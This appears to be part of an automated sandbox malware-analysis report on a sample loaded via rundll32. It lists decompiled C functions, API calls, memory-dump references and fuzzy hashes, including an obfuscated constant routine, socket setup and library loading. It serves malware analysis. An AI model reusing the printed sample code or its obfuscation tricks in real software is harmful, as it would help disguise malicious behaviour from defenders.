                                                                                                                                                                            0x0475d14b
                                                                                                                                                                            0x0475d14f
                                                                                                                                                                            0x0475d156
                                                                                                                                                                            0x0475d15d
                                                                                                                                                                            0x0475d164
                                                                                                                                                                            0x0475d16b
                                                                                                                                                                            0x0475d172
                                                                                                                                                                            0x0475d176
                                                                                                                                                                            0x0475d17d
                                                                                                                                                                            0x0475d184
                                                                                                                                                                            0x0475d18b
                                                                                                                                                                            0x0475d1ac
                                                                                                                                                                            0x0475d1b6

                                                                                                                                                                            APIs
                                                                                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 0475D1B6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254208432.0000000004741000.00000020.00000001.sdmp, Offset: 04740000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254203541.0000000004740000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254227760.0000000004766000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_4740000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                            • Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                                                                                            • Instruction ID: 15b606c2e735d673c6cccce30cd0c53e71df62e9c7625dd229c3605d66445b83
                                                                                                                                                                            • Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                                                                                            • Instruction Fuzzy Hash: B811D0B1C4430DEBDB54DFE5D94AA9EBBB0EB00749F108588D521B6250D3B89A489F91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 310 476061d-47606eb call 475fe29 call 474eb52 lstrcmpiW
                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                            			E0476061D(signed int __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				void* _t44;
                                                                                                                                                                            				int _t53;
                                                                                                                                                                            				WCHAR* _t56;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_t56 = __edx;
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E0475FE29(_t44);
                                                                                                                                                                            				_v24 = _v24 & 0x00000000;
                                                                                                                                                                            				_v28 = 0xcd60b7;
                                                                                                                                                                            				_v12 = 0x7257ab;
                                                                                                                                                                            				_v12 = _v12 << 0xd;
                                                                                                                                                                            				_v12 = _v12 + 0x8f69;
                                                                                                                                                                            				_v12 = _v12 * 0x4c;
                                                                                                                                                                            				_v12 = _v12 ^ 0x410f7a13;
                                                                                                                                                                            				_v8 = 0x7b4696;
                                                                                                                                                                            				_v8 = _v8 + 0xffff4950;
                                                                                                                                                                            				_v8 = _v8 | 0x2a0f624b;
                                                                                                                                                                            				_v8 = _v8 * 0x3a;
                                                                                                                                                                            				_v8 = _v8 ^ 0xa0f3ec54;
                                                                                                                                                                            				_v20 = 0x8a2161;
                                                                                                                                                                            				_v20 = _v20 + 0xffff45ea;
                                                                                                                                                                            				_v20 = _v20 ^ 0x1b6c7fa6;
                                                                                                                                                                            				_v20 = _v20 ^ 0x1be8dede;
                                                                                                                                                                            				_v16 = 0xdcc12a;
                                                                                                                                                                            				_v16 = _v16 + 0xb9f4;
                                                                                                                                                                            				_v16 = _v16 + 0xffffcfef;
                                                                                                                                                                            				_v16 = _v16 ^ 0x00d9de04;
                                                                                                                                                                            				E0474EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
                                                                                                                                                                            				_t53 = lstrcmpiW(_a4, _t56); // executed
                                                                                                                                                                            				return _t53;
                                                                                                                                                                            			}












                                                                                                                                                                            0x04760624
                                                                                                                                                                            0x04760627
                                                                                                                                                                            0x04760629
                                                                                                                                                                            0x0476062c
                                                                                                                                                                            0x0476062f
                                                                                                                                                                            0x04760630
                                                                                                                                                                            0x04760631
                                                                                                                                                                            0x04760636
                                                                                                                                                                            0x0476063d
                                                                                                                                                                            0x04760644
                                                                                                                                                                            0x0476064b
                                                                                                                                                                            0x0476064f
                                                                                                                                                                            0x04760667
                                                                                                                                                                            0x0476066a
                                                                                                                                                                            0x04760671
                                                                                                                                                                            0x04760678
                                                                                                                                                                            0x0476067f
                                                                                                                                                                            0x0476068b
                                                                                                                                                                            0x0476068e
                                                                                                                                                                            0x04760695
                                                                                                                                                                            0x0476069c
                                                                                                                                                                            0x047606a3
                                                                                                                                                                            0x047606aa
                                                                                                                                                                            0x047606b1
                                                                                                                                                                            0x047606b8
                                                                                                                                                                            0x047606bf
                                                                                                                                                                            0x047606c6
                                                                                                                                                                            0x047606d9
                                                                                                                                                                            0x047606e5
                                                                                                                                                                            0x047606eb

                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 047606E5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254208432.0000000004741000.00000020.00000001.sdmp, Offset: 04740000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254203541.0000000004740000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254227760.0000000004766000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_4740000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1586166983-0
                                                                                                                                                                            • Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                                                                                            • Instruction ID: bdc5c3e693d94e1e323ada5d2113d482243bfb9a253ce2f670fac32cd9f309b7
                                                                                                                                                                            • Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                                                                                            • Instruction Fuzzy Hash: 252113B1C01309ABCF14DFA9D9499DEBFB5FB10354F108198E529A6251D3B59B04CF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            APIs
                                                                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 100011F1
                                                                                                                                                                            • _memset.LIBCMT ref: 10001205
                                                                                                                                                                            • htonl.WS2_32(00000000), ref: 1000121B
                                                                                                                                                                            • htons.WS2_32(?), ref: 1000122F
                                                                                                                                                                            • socket.WS2_32(00000002,00000002,00000000), ref: 10001245
                                                                                                                                                                            • bind.WS2_32(?,?,00000010), ref: 1000126A
                                                                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 100012AC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1003240404-0
                                                                                                                                                                            • Opcode ID: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
                                                                                                                                                                            • Instruction ID: 88ed1bb05716eef25c8d7e89d15ea7d56457a166ccc4c5acc9453768105f33a4
                                                                                                                                                                            • Opcode Fuzzy Hash: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
                                                                                                                                                                            • Instruction Fuzzy Hash: 1C215974A01228AFE760DF60CC85BD9B7B4EF49714F1081D8E949AB381CB71A9C2DF51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                            			E10008B90(intOrPtr __ecx) {
                                                                                                                                                                            				int _v8;
                                                                                                                                                                            				int _v12;
                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				char _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				struct HDC__* _v120;
                                                                                                                                                                            				char _v124;
                                                                                                                                                                            				int _v128;
                                                                                                                                                                            				int _v132;
                                                                                                                                                                            				int _v136;
                                                                                                                                                                            				struct HICON__* _v140;
                                                                                                                                                                            				intOrPtr _v144;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                            				int _t40;
                                                                                                                                                                            				void* _t41;
                                                                                                                                                                            				void* _t66;
                                                                                                                                                                            				struct tagRECT* _t82;
                                                                                                                                                                            				void* _t84;
                                                                                                                                                                            				void* _t85;
                                                                                                                                                                            				signed int _t86;
                                                                                                                                                                            
                                                                                                                                                                            				_t37 =  *0x10057a08; // 0xaf9b6515
                                                                                                                                                                            				_v32 = _t37 ^ _t86;
                                                                                                                                                                            				_v144 = __ecx;
                                                                                                                                                                            				_t40 = IsIconic( *(_v144 + 0x20));
                                                                                                                                                                            				_t87 = _t40;
                                                                                                                                                                            				if(_t40 == 0) {
                                                                                                                                                                            					_t41 = E1000C473(_t66, _v144, _t84, _t85, __eflags);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_push(_v144);
                                                                                                                                                                            					E10013247(_t66,  &_v124, _t84, _t85, _t87);
                                                                                                                                                                            					_t88 =  &_v124;
                                                                                                                                                                            					if( &_v124 != 0) {
                                                                                                                                                                            						_v136 = _v120;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_v136 = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					SendMessageA( *(_v144 + 0x20), 0x27, _v136, 0);
                                                                                                                                                                            					_v128 = GetSystemMetrics(0xb);
                                                                                                                                                                            					_v132 = GetSystemMetrics(0xc);
                                                                                                                                                                            					_t82 =  &_v28;
                                                                                                                                                                            					GetClientRect( *(_v144 + 0x20), _t82);
                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                            					_v12 = _v20 - _v28 - _v128 + 1 - _t82 >> 1;
                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                            					_v8 = _v16 - _v24 - _v132 + 1 - _t82 >> 1;
                                                                                                                                                                            					_v140 =  *((intOrPtr*)(_v144 + 0x188));
                                                                                                                                                                            					_t79 = _v8;
                                                                                                                                                                            					DrawIcon(_v120, _v12, _v8, _v140);
                                                                                                                                                                            					_t41 = E1001329B(_t66,  &_v124, _t84, _t85, _t88);
                                                                                                                                                                            				}
                                                                                                                                                                            				return E100167D5(_t41, _t66, _v32 ^ _t86, _t79, _t84, _t85);
                                                                                                                                                                            			}


























                                                                                                                                                                            0x10008b99
                                                                                                                                                                            0x10008ba0
                                                                                                                                                                            0x10008ba3
                                                                                                                                                                            0x10008bb3
                                                                                                                                                                            0x10008bb9
                                                                                                                                                                            0x10008bbb
                                                                                                                                                                            0x10008c94
                                                                                                                                                                            0x10008bc1
                                                                                                                                                                            0x10008bc7
                                                                                                                                                                            0x10008bcb
                                                                                                                                                                            0x10008bd3
                                                                                                                                                                            0x10008bd5
                                                                                                                                                                            0x10008be6
                                                                                                                                                                            0x10008bd7
                                                                                                                                                                            0x10008bd7
                                                                                                                                                                            0x10008bd7
                                                                                                                                                                            0x10008c01
                                                                                                                                                                            0x10008c0f
                                                                                                                                                                            0x10008c1a
                                                                                                                                                                            0x10008c1d
                                                                                                                                                                            0x10008c2b
                                                                                                                                                                            0x10008c3d
                                                                                                                                                                            0x10008c42
                                                                                                                                                                            0x10008c51
                                                                                                                                                                            0x10008c56
                                                                                                                                                                            0x10008c65
                                                                                                                                                                            0x10008c72
                                                                                                                                                                            0x10008c7e
                                                                                                                                                                            0x10008c87
                                                                                                                                                                            0x10008c87
                                                                                                                                                                            0x10008ca6

                                                                                                                                                                            APIs
                                                                                                                                                                            • IsIconic.USER32 ref: 10008BB3
                                                                                                                                                                              • Part of subcall function 10013247: __EH_prolog3.LIBCMT ref: 1001324E
                                                                                                                                                                              • Part of subcall function 10013247: BeginPaint.USER32(?,?,00000004,1000C48A,?,00000058,10008C99), ref: 1001327A
                                                                                                                                                                            • SendMessageA.USER32(?,00000027,?,00000000), ref: 10008C01
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10008C09
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10008C14
                                                                                                                                                                            • GetClientRect.USER32 ref: 10008C2B
                                                                                                                                                                            • DrawIcon.USER32 ref: 10008C7E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1007970657-0
                                                                                                                                                                            • Opcode ID: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
                                                                                                                                                                            • Instruction ID: 92cad86a1f48a06ffd889b7e25b84ff06398f92b7342aaec6ad7b9fd969ef154
                                                                                                                                                                            • Opcode Fuzzy Hash: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
                                                                                                                                                                            • Instruction Fuzzy Hash: BB31F975A00119DFEB24CFA8C995F9EBBB4FF48240F108299E549E7285DE30AA44CF60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                                            			E1000A803(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				char _v284;
                                                                                                                                                                            				char _v288;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                            				intOrPtr* _t18;
                                                                                                                                                                            				void* _t26;
                                                                                                                                                                            				void* _t27;
                                                                                                                                                                            				void* _t33;
                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                            				void* _t35;
                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                            				void* _t37;
                                                                                                                                                                            
                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                            				_t32 = __edx;
                                                                                                                                                                            				_t28 = __ecx;
                                                                                                                                                                            				_t26 = __ebx;
                                                                                                                                                                            				_t9 =  *0x10057a08; // 0xaf9b6515
                                                                                                                                                                            				_v8 = _t9 ^ _t36;
                                                                                                                                                                            				_t39 = _a4 - 0x800;
                                                                                                                                                                            				_t35 = __ecx;
                                                                                                                                                                            				if(_a4 != 0x800) {
                                                                                                                                                                            					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						goto L2;
                                                                                                                                                                            					} else {
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_push(E1001808E(__edx,  &_v288, 4, "LOC"));
                                                                                                                                                                            					E10009BC7(__ebx, _t28, __edi, _t35);
                                                                                                                                                                            					_t37 = _t37 + 0x10;
                                                                                                                                                                            					L2:
                                                                                                                                                                            					_push(_t26);
                                                                                                                                                                            					_push(_t33);
                                                                                                                                                                            					_t34 =  *(E10017D62(_t39));
                                                                                                                                                                            					 *(E10017D62(_t39)) =  *_t14 & 0x00000000;
                                                                                                                                                                            					_t35 = 0x112;
                                                                                                                                                                            					_t27 = E10016E0C( &_v284, 0x112, 0x111, 0x112,  &_v288);
                                                                                                                                                                            					_t18 = E10017D62(_t39);
                                                                                                                                                                            					_t40 =  *_t18;
                                                                                                                                                                            					if( *_t18 == 0) {
                                                                                                                                                                            						 *(E10017D62(__eflags)) = _t34;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						E10009DD1( *((intOrPtr*)(E10017D62(_t40))));
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t27 == 0xffffffff || _t27 >= _t35) {
                                                                                                                                                                            						_t12 = 0;
                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t12 = LoadLibraryA( &_v284);
                                                                                                                                                                            					}
                                                                                                                                                                            					_pop(_t33);
                                                                                                                                                                            					_pop(_t26);
                                                                                                                                                                            				}
                                                                                                                                                                            				return E100167D5(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
                                                                                                                                                                            			}

















                                                                                                                                                                            0x1000a803
                                                                                                                                                                            0x1000a803
                                                                                                                                                                            0x1000a803
                                                                                                                                                                            0x1000a803
                                                                                                                                                                            0x1000a80c
                                                                                                                                                                            0x1000a813
                                                                                                                                                                            0x1000a816
                                                                                                                                                                            0x1000a81e
                                                                                                                                                                            0x1000a826
                                                                                                                                                                            0x1000a89a
                                                                                                                                                                            0x1000a89c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000a89e
                                                                                                                                                                            0x1000a828
                                                                                                                                                                            0x1000a835
                                                                                                                                                                            0x1000a836
                                                                                                                                                                            0x1000a83b
                                                                                                                                                                            0x1000a83e
                                                                                                                                                                            0x1000a83e
                                                                                                                                                                            0x1000a83f
                                                                                                                                                                            0x1000a845
                                                                                                                                                                            0x1000a84c
                                                                                                                                                                            0x1000a85c
                                                                                                                                                                            0x1000a871
                                                                                                                                                                            0x1000a873
                                                                                                                                                                            0x1000a878
                                                                                                                                                                            0x1000a87b
                                                                                                                                                                            0x1000a8a5
                                                                                                                                                                            0x1000a87d
                                                                                                                                                                            0x1000a884
                                                                                                                                                                            0x1000a889
                                                                                                                                                                            0x1000a8aa
                                                                                                                                                                            0x1000a8bf
                                                                                                                                                                            0x1000a8bf
                                                                                                                                                                            0x1000a8b0
                                                                                                                                                                            0x1000a8b7
                                                                                                                                                                            0x1000a8b7
                                                                                                                                                                            0x1000a8c1
                                                                                                                                                                            0x1000a8c2
                                                                                                                                                                            0x1000a8c2
                                                                                                                                                                            0x1000a8cf

                                                                                                                                                                            APIs
                                                                                                                                                                            • _strcpy_s.LIBCMT ref: 1000A830
                                                                                                                                                                              • Part of subcall function 10009BC7: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                                                                                              • Part of subcall function 10009BC7: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                                                                                              • Part of subcall function 10017D62: __getptd_noexit.LIBCMT ref: 10017D62
                                                                                                                                                                            • __snprintf_s.LIBCMT ref: 1000A869
                                                                                                                                                                              • Part of subcall function 10016E0C: __vsnprintf_s_l.LIBCMT ref: 10016E21
                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 1000A894
                                                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 1000A8B7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                                                                            • String ID: LOC
                                                                                                                                                                            • API String ID: 4018564869-519433814
                                                                                                                                                                            • Opcode ID: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
                                                                                                                                                                            • Instruction ID: ee9450464cbd3e0ce3331b4d2b41357aa0e69ec1529eb2fe66138b72776ed960
                                                                                                                                                                            • Opcode Fuzzy Hash: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
                                                                                                                                                                            • Instruction Fuzzy Hash: A9119A7190411CABF725D760DC86BDD37B8EF06790F504161F6049B191DF74AEC68BA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                            			E100167D5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                            				intOrPtr _v0;
                                                                                                                                                                            				void* _v804;
                                                                                                                                                                            				intOrPtr _v808;
                                                                                                                                                                            				intOrPtr _v812;
                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                            				intOrPtr _t13;
                                                                                                                                                                            				long _t17;
                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                            				intOrPtr _t22;
                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                            				intOrPtr* _t31;
                                                                                                                                                                            				void* _t34;
                                                                                                                                                                            
                                                                                                                                                                            				_t27 = __esi;
                                                                                                                                                                            				_t26 = __edi;
                                                                                                                                                                            				_t25 = __edx;
                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                            				_t6 = __eax;
                                                                                                                                                                            				_t34 = _t22 -  *0x10057a08; // 0xaf9b6515
                                                                                                                                                                            				if(_t34 == 0) {
                                                                                                                                                                            					asm("repe ret");
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x1005afc0 = _t6;
                                                                                                                                                                            				 *0x1005afbc = _t22;
                                                                                                                                                                            				 *0x1005afb8 = _t25;
                                                                                                                                                                            				 *0x1005afb4 = _t21;
                                                                                                                                                                            				 *0x1005afb0 = _t27;
                                                                                                                                                                            				 *0x1005afac = _t26;
                                                                                                                                                                            				 *0x1005afd8 = ss;
                                                                                                                                                                            				 *0x1005afcc = cs;
                                                                                                                                                                            				 *0x1005afa8 = ds;
                                                                                                                                                                            				 *0x1005afa4 = es;
                                                                                                                                                                            				 *0x1005afa0 = fs;
                                                                                                                                                                            				 *0x1005af9c = gs;
                                                                                                                                                                            				asm("pushfd");
                                                                                                                                                                            				_pop( *0x1005afd0);
                                                                                                                                                                            				 *0x1005afc4 =  *_t31;
                                                                                                                                                                            				 *0x1005afc8 = _v0;
                                                                                                                                                                            				 *0x1005afd4 =  &_a4;
                                                                                                                                                                            				 *0x1005af10 = 0x10001;
                                                                                                                                                                            				_t11 =  *0x1005afc8; // 0x0
                                                                                                                                                                            				 *0x1005aec4 = _t11;
                                                                                                                                                                            				 *0x1005aeb8 = 0xc0000409;
                                                                                                                                                                            				 *0x1005aebc = 1;
                                                                                                                                                                            				_t12 =  *0x10057a08; // 0xaf9b6515
                                                                                                                                                                            				_v812 = _t12;
                                                                                                                                                                            				_t13 =  *0x10057a0c; // 0x50649aea
                                                                                                                                                                            				_v808 = _t13;
                                                                                                                                                                            				 *0x1005af08 = IsDebuggerPresent();
                                                                                                                                                                            				_push(1);
                                                                                                                                                                            				E100227FB(_t14);
                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                            				_t17 = UnhandledExceptionFilter(0x1002b434);
                                                                                                                                                                            				if( *0x1005af08 == 0) {
                                                                                                                                                                            					_push(1);
                                                                                                                                                                            					E100227FB(_t17);
                                                                                                                                                                            				}
                                                                                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                            			}



















                                                                                                                                                                            0x100167d5
                                                                                                                                                                            0x100167d5
                                                                                                                                                                            0x100167d5
                                                                                                                                                                            0x100167d5
                                                                                                                                                                            0x100167d5
                                                                                                                                                                            0x100167d5
                                                                                                                                                                            0x100167d5
                                                                                                                                                                            0x100167db
                                                                                                                                                                            0x100167dd
                                                                                                                                                                            0x100167dd
                                                                                                                                                                            0x1001c395
                                                                                                                                                                            0x1001c39a
                                                                                                                                                                            0x1001c3a0
                                                                                                                                                                            0x1001c3a6
                                                                                                                                                                            0x1001c3ac
                                                                                                                                                                            0x1001c3b2
                                                                                                                                                                            0x1001c3b8
                                                                                                                                                                            0x1001c3bf
                                                                                                                                                                            0x1001c3c6
                                                                                                                                                                            0x1001c3cd
                                                                                                                                                                            0x1001c3d4
                                                                                                                                                                            0x1001c3db
                                                                                                                                                                            0x1001c3e2
                                                                                                                                                                            0x1001c3e3
                                                                                                                                                                            0x1001c3ec
                                                                                                                                                                            0x1001c3f4
                                                                                                                                                                            0x1001c3fc
                                                                                                                                                                            0x1001c407
                                                                                                                                                                            0x1001c411
                                                                                                                                                                            0x1001c416
                                                                                                                                                                            0x1001c41b
                                                                                                                                                                            0x1001c425
                                                                                                                                                                            0x1001c42f
                                                                                                                                                                            0x1001c434
                                                                                                                                                                            0x1001c43a
                                                                                                                                                                            0x1001c43f
                                                                                                                                                                            0x1001c44b
                                                                                                                                                                            0x1001c450
                                                                                                                                                                            0x1001c452
                                                                                                                                                                            0x1001c45a
                                                                                                                                                                            0x1001c465
                                                                                                                                                                            0x1001c472
                                                                                                                                                                            0x1001c474
                                                                                                                                                                            0x1001c476
                                                                                                                                                                            0x1001c47b
                                                                                                                                                                            0x1001c48f

                                                                                                                                                                            APIs
                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 1001C445
                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001C45A
                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(1002B434), ref: 1001C465
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 1001C481
                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 1001C488
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2579439406-0
